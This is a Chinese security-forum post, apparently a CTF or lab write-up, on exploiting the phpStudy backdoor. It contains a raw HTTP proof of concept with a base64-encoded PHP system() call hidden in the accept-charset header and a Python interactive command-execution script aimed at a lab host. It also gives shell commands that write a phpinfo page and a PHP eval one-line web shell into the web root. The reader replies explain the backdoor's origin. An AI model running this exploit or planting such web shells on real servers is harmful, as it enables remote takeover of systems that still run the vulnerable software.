猫舍 phpstudy getshell

jussi   ·   发表于 2021-09-25 10:56:11   ·   CTF&WP专版

phpstudy backdoor RCE

poc:

GET /?id=1 HTTP/1.1
Host: rhiq8003.ia.aqlab.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://rhiq8003.ia.aqlab.cn/
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

exp:

# jussi
import base64
import requests
import re

print("\n========== Phpstudy Backdoor Exploit ============\n")

def os_shell(url,headers,payload):
    try:
        r = requests.get(url = url, headers = headers, verify = False, timeout = 20)
        res = re.findall("flag(.*?)flag", r.text, re.S)
        res = "".join(res)
        print(res)
    except:
        print("[ - ]=========== Failed! Timeout... ==========[ - ]\n")

def main():
    url = "http://rhiq8003.ia.aqlab.cn/"
    while True:
        cmd = input("> ")
        payload = "echo \"flag\";system(\"" + cmd + "\");echo \"flag\";"
        payload = base64.b64encode(payload.encode('utf-8'))
        payload = str(payload, 'utf-8')
        headers = {
            'Upgrade-Insecure-Requests': '1',
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'accept-charset': payload,
            'Accept-Encoding': 'gzip,deflate',
            'Connection': 'close',
        }
        os_shell(url=url, headers=headers, payload=payload)

if __name__ == '__main__':
    main()

写入 phpinfo()

echo \"<?php phpinfo();?>\" > ..\WWW\qazwsx.php

写入 一句话木马

echo \"<?php eval(@\$_POST['zkaqzkaq']);?>\" > ..\WWW\qazwsxedc.php

用户名金币积分时间理由
Track-聂风 30.00 0 2021-10-09 14:02:52 一个受益终生的帖子~~

打赏我,让我更有动力~

2 条回复   |  直到 2021-10-24 | 1169 次浏览

Track-聂风
发表于 2021-10-9

原理是因为PHPstudy的官网曾经被人黑过,然后换了他们官方的下载文件内容,偷偷的放了后门,且这件事情存在了好几年没被发现。

评论列表

  • 加载数据中...

编写评论内容

dienamer
发表于 2021-10-24

这个漏洞没怎么看懂,是抓的,靶场的包吗。

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.